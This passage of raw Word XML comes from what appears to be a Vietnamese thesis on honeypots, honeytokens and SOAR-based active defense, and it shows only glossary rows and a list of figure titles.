              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000054">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Thời gian trung bình để phản ứng và xử lý sự cố</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55">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">MTTD</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000056">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Mean Time to Detect</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000057">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Thời gian trung bình để phát hiện sự cố an ninh</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000058">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Tarpit</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000059">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Connection Tarpitting</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005A">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Kỹ thuật làm chậm và giam giữ kết nối mạng</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5B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Canary Token</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Honeytoken / Canary Webhook</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005D">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Dữ liệu mồi nhử dùng để phát hiện đánh cắp và lộ lọt</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005E">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5F">
      <w:pPr>
        <w:keepNext w:val="1"/>
        <w:spacing w:before="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="00336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0">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DANH MỤC HÌNH VẼ MINH HỌA</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000061">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0.2: Danh mục các hình vẽ và biểu đồ trong đồ án</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2"/>
        <w:tblW w:w="94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4"/>
        <w:gridCol w:w="3134"/>
        <w:gridCol w:w="3134"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="3134"/>
            <w:gridCol w:w="3134"/>
            <w:gridCol w:w="3134"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f497d" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000062">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Ký hiệu</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f497d" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000063">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Tên hình minh họa</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f497d" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000064">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Trang</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000065">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Hình 2.1</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000066">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Mô hình phân loại Honeypot theo mức độ tương tác (Low, Medium, High)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000067">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">12</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68">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Hình 2.2</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000069">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Kiến trúc mô phỏng hệ thống tệp và lệnh của Cowrie Honeypot</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006A">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>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006B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Hình 2.3</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006C">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Vòng đời xử lý sự cố an ninh chuẩn NIST SP 800-61 r2 tích hợp SOAR</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006D">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">17</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6E">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Hình 3.1</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006F">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Sơ đồ kiến trúc tổng thể 5 phân lớp của Hệ sinh thái Active Defense &amp; SOAR</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000070">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">21</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000071">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Hình 3.2</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000072">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Lưu đồ thuật toán Động cơ Tương quan Sự kiện và Ánh xạ MITRE ATT&amp;CK</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000073">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">24</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74">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Hình 3.3</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000075">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Cơ chế bẫy mồi Honeytoken và khử ẩn danh kẻ tấn công (De-anonymization)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
